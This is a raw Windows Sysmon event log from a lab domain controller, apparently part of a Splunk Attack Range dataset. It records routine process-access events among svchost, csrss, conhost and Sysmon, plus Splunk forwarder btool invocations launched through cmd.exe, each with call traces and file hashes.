13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EE2-6005-AF00-00000000A301}42204116C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.823{59A5CD1D-8EE2-6005-B000-00000000A301}4112C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list httpServerListener: --no-log 10341000x80000000000000003565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8EE2-6005-AE00-00000000A301}41364140C:\Windows\system32\cmd.exe{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.816{59A5CD1D-8EE2-6005-AF00-00000000A301}4220C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list httpServerListener: --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list httpServerListener: --no-log 10341000x80000000000000003552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8EE2-6005-AE00-00000000A301}4136C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.811{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 